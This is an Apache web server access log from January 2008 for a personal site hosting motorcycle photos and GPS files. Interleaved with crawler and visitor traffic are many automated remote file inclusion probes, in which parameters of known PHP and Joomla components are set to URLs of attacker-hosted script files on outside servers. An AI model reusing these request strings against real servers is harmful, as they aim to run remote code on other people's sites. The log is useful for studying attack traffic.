74.6.26.232 - - [15/Jan/2008:19:25:34 -0800] "GET /logs/access_071213.log HTTP/1.0" 200 79346 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.85.29.25 - - [15/Jan/2008:19:26:25 -0800] "GET /m2f/m2f_phpbb204.php?m2f_root_path=http://party4you.ch/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
209.85.29.25 - - [15/Jan/2008:19:26:29 -0800] "GET /logs/m2f/m2f_phpbb204.php?m2f_root_path=http://party4you.ch/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
81.52.143.16 - - [15/Jan/2008:19:26:59 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
81.52.143.16 - - [15/Jan/2008:19:27:01 -0800] "GET /presto HTTP/1.1" 301 91 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
72.30.179.229 - - [15/Jan/2008:19:28:26 -0800] "GET /bikes/dteel/03MAR07/?M=A HTTP/1.0" 200 692 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:19:30:57 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.220.212.155 - - [15/Jan/2008:19:32:35 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.136.51.92 - - [15/Jan/2008:19:34:12 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=30553&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
41.206.160.2 - - [15/Jan/2008:19:35:07 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
41.206.160.2 - - [15/Jan/2008:19:35:08 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
209.85.29.25 - - [15/Jan/2008:19:35:20 -0800] "GET /logs/db.php?path_local=http://party4you.ch/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
209.85.29.25 - - [15/Jan/2008:19:35:20 -0800] "GET /db.php?path_local=http://party4you.ch/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
206.220.64.3 - - [15/Jan/2008:19:35:22 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.29.25 - - [15/Jan/2008:19:36:46 -0800] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://party4you.ch/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
209.85.29.25 - - [15/Jan/2008:19:36:48 -0800] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://party4you.ch/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
209.85.29.25 - - [15/Jan/2008:19:37:05 -0800] "GET /frag.php?exec=http://party4you.ch/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
209.85.29.25 - - [15/Jan/2008:19:37:05 -0800] "GET /logs/frag.php?exec=http://party4you.ch/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
81.168.179.3 - - [15/Jan/2008:19:39:26 -0800] "GET /logs/access_071229.log//////////components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.168.179.3 - - [15/Jan/2008:19:39:27 -0800] "GET //////////components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.168.179.3 - - [15/Jan/2008:19:39:28 -0800] "GET /logs//////////components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.144.227.63 - - [15/Jan/2008:19:39:40 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.1" 200 849 "http://www.st-owners.com/forums/showthread.php?t=28267&page=20&highlight=westoc+xiii" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
24.144.227.63 - - [15/Jan/2008:19:39:50 -0800] "GET /bikes/GPS/WeSTOC2006/Golden.zip HTTP/1.1" 200 196608 "http://www.dmulk.com/bikes/GPS/WeSTOC2006/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
24.144.227.63 - - [15/Jan/2008:19:40:01 -0800] "GET /bikes/GPS/WeSTOC2006/Golden.zip HTTP/1.1" 206 327680 "http://www.prosper.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SBUA) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
24.144.227.63 - - [15/Jan/2008:19:40:01 -0800] "GET /bikes/GPS/WeSTOC2006/Golden.zip HTTP/1.1" 206 115183 "http://www.prosper.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SBUA) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
24.144.227.63 - - [15/Jan/2008:19:40:02 -0800] "GET /bikes/GPS/WeSTOC2006/Golden.zip HTTP/1.1" 206 115183 "http://www.prosper.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SBUA) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
24.144.227.63 - - [15/Jan/2008:19:40:02 -0800] "GET /bikes/GPS/WeSTOC2006/Golden.zip HTTP/1.1" 206 115183 "http://www.prosper.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SBUA) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
24.144.227.63 - - [15/Jan/2008:19:40:02 -0800] "GET /bikes/GPS/WeSTOC2006/Golden.zip HTTP/1.1" 206 115183 "http://www.prosper.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SBUA) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
211.233.63.186 - - [15/Jan/2008:19:42:18 -0800] "GET /logs/access_071225.log//modifyform.htm//modifyform.html?code=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [15/Jan/2008:19:42:18 -0800] "GET //modifyform.htm//modifyform.html?code=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [15/Jan/2008:19:42:19 -0800] "GET /logs//modifyform.htm//modifyform.html?code=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.197.124.107 - - [15/Jan/2008:19:42:26 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
81.168.179.3 - - [15/Jan/2008:19:43:32 -0800] "GET /logs/access_071228.log//////////components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.144.227.63 - - [15/Jan/2008:19:46:36 -0800] "GET /bikes/GPS/WeSTOC2006/Madmaps.zip HTTP/1.1" 200 196608 "http://www.dmulk.com/bikes/GPS/WeSTOC2006/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
24.144.227.63 - - [15/Jan/2008:19:46:43 -0800] "GET /bikes/GPS/WeSTOC2006/Madmaps.zip HTTP/1.1" 206 224331 "http://www.prosper.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SBUA) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
24.144.227.63 - - [15/Jan/2008:19:46:43 -0800] "GET /bikes/GPS/WeSTOC2006/Madmaps.zip HTTP/1.1" 206 224331 "http://www.prosper.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SBUA) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
24.144.227.63 - - [15/Jan/2008:19:46:43 -0800] "GET /bikes/GPS/WeSTOC2006/Madmaps.zip HTTP/1.1" 206 224331 "http://www.prosper.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SBUA) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
24.144.227.63 - - [15/Jan/2008:19:46:44 -0800] "GET /bikes/GPS/WeSTOC2006/Madmaps.zip HTTP/1.1" 206 224333 "http://www.prosper.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SBUA) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
24.144.227.63 - - [15/Jan/2008:19:47:08 -0800] "GET /bikes/GPS/WeSTOC2006/Madmaps.zip HTTP/1.1" 206 393216 "http://www.prosper.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SBUA) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
76.86.62.38 - - [15/Jan/2008:19:48:27 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:19:49:26 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:19:49:27 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:19:49:27 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.56.55.214 - - [15/Jan/2008:19:54:25 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.6.24.106 - - [15/Jan/2008:19:58:49 -0800] "GET /minamijewelry/source_images/?M=A HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.86.201.130 - - [15/Jan/2008:20:01:02 -0800] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [15/Jan/2008:20:01:02 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [15/Jan/2008:20:01:03 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.73 - - [15/Jan/2008:20:03:10 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.247.217.39 - - [15/Jan/2008:20:07:30 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yeti/0.01 (nhn/1noon, yetibot@naver.com, check robots.txt daily and follow it)" "www.dmulk.com"
61.247.217.39 - - [15/Jan/2008:20:07:30 -0800] "GET /presto/?N=D HTTP/1.1" 200 526 "-" "Yeti/0.01 (nhn/1noon, yetibot@naver.com, check robots.txt daily and follow it)" "www.dmulk.com"
74.200.201.194 - - [15/Jan/2008:20:07:34 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pablofms.com/pablo/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [15/Jan/2008:20:07:34 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pablofms.com/pablo/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [15/Jan/2008:20:07:34 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pablofms.com/pablo/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.43 - - [15/Jan/2008:20:08:34 -0800] "GET /minamijewelry/?D=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
71.231.35.184 - - [15/Jan/2008:20:11:06 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.1" 200 849 "http://www.st-owners.com/forums/showthread.php?t=28267&page=20" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; IEMB3)" "www.dmulk.com"
71.231.35.184 - - [15/Jan/2008:20:11:07 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; IEMB3)" "www.dmulk.com"
61.247.217.39 - - [15/Jan/2008:20:14:26 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yeti/0.01 (nhn/1noon, yetibot@naver.com, check robots.txt daily and follow it)" "www.dmulk.com"
61.247.217.39 - - [15/Jan/2008:20:14:26 -0800] "GET /presto/?D=A HTTP/1.1" 200 526 "-" "Yeti/0.01 (nhn/1noon, yetibot@naver.com, check robots.txt daily and follow it)" "www.dmulk.com"
82.192.68.176 - - [15/Jan/2008:20:15:16 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://dj4you.ch/vsd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
81.168.179.3 - - [15/Jan/2008:20:16:21 -0800] "GET /logs/access_071229.log//////////components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.168.179.3 - - [15/Jan/2008:20:16:21 -0800] "GET //////////components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.168.179.3 - - [15/Jan/2008:20:16:24 -0800] "GET /logs//////////components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.150.32.163 - - [15/Jan/2008:20:19:08 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.saenterpriseworkshop.com/vnc/MIC22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.150.32.163 - - [15/Jan/2008:20:19:12 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.saenterpriseworkshop.com/vnc/MIC22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.150.32.163 - - [15/Jan/2008:20:19:13 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.saenterpriseworkshop.com/vnc/MIC22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.118.209.107 - - [15/Jan/2008:20:19:45 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.1" 200 849 "http://www.st-owners.com/forums/showthread.php?t=28267&page=20" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
68.118.209.107 - - [15/Jan/2008:20:19:46 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
74.6.29.19 - - [15/Jan/2008:20:26:08 -0800] "GET /tmp/ HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.208.187.75 - - [15/Jan/2008:20:31:20 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?p=368191" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
64.160.107.168 - - [15/Jan/2008:20:35:44 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
81.168.179.3 - - [15/Jan/2008:20:38:28 -0800] "GET /logs/access_071229.log//////////modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.168.179.3 - - [15/Jan/2008:20:38:29 -0800] "GET //////////modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.168.179.3 - - [15/Jan/2008:20:38:29 -0800] "GET /logs//////////modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.217.77.215 - - [15/Jan/2008:20:41:23 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.1" 200 849 "http://www.st-owners.com/forums/showthread.php?t=28267&page=20" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
12.217.77.215 - - [15/Jan/2008:20:41:24 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.5.16.167 - - [15/Jan/2008:20:44:17 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.200.201.194 - - [15/Jan/2008:20:49:22 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pablofms.com/pablo/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.69.135 - - [15/Jan/2008:20:50:20 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
24.253.253.229 - - [15/Jan/2008:20:51:05 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 200 913443 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; Zune 2.0)" "www.dmulk.com"
24.253.253.229 - - [15/Jan/2008:20:51:05 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 200 927196 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; Zune 2.0)" "www.dmulk.com"
24.253.253.229 - - [15/Jan/2008:20:51:07 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 200 828304 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; Zune 2.0)" "www.dmulk.com"
24.253.253.229 - - [15/Jan/2008:20:51:08 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 200 842640 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; Zune 2.0)" "www.dmulk.com"
24.253.253.229 - - [15/Jan/2008:20:51:12 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 200 812848 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; Zune 2.0)" "www.dmulk.com"
24.253.253.229 - - [15/Jan/2008:20:51:26 -0800] "GET /bikes/dteel/EQ2/Fraaxia_thumb.jpg HTTP/1.1" 200 26169 "http://www.guildportal.com/Guild.aspx?GuildID=80731&ForumID=375139&TabID=695682&TopicID=6187036" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; Zune 2.0)" "www.dmulk.com"
74.6.29.37 - - [15/Jan/2008:20:51:56 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.16.96.219 - - [15/Jan/2008:20:52:50 -0800] "GET /logs/access_071229.log/?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [15/Jan/2008:20:52:51 -0800] "GET /?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [15/Jan/2008:20:52:52 -0800] "GET /logs/?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 200 30253 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.246.56 - - [15/Jan/2008:20:54:52 -0800] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.246.56 - - [15/Jan/2008:20:54:54 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.246.56 - - [15/Jan/2008:20:54:55 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.191.18.167 - - [15/Jan/2008:21:00:56 -0800] "GET /logs/access_071228.log/!scanhttp://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.18.167 - - [15/Jan/2008:21:00:56 -0800] "GET /!scanhttp://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.18.167 - - [15/Jan/2008:21:00:57 -0800] "GET /logs/!scanhttp://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.18.167 - - [15/Jan/2008:21:01:49 -0800] "GET /logs/access_071225.log/!scanhttp://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.175.71.74 - - [15/Jan/2008:21:08:58 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
195.140.234.80 - - [15/Jan/2008:21:11:35 -0800] "GET /logs/access_071229.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
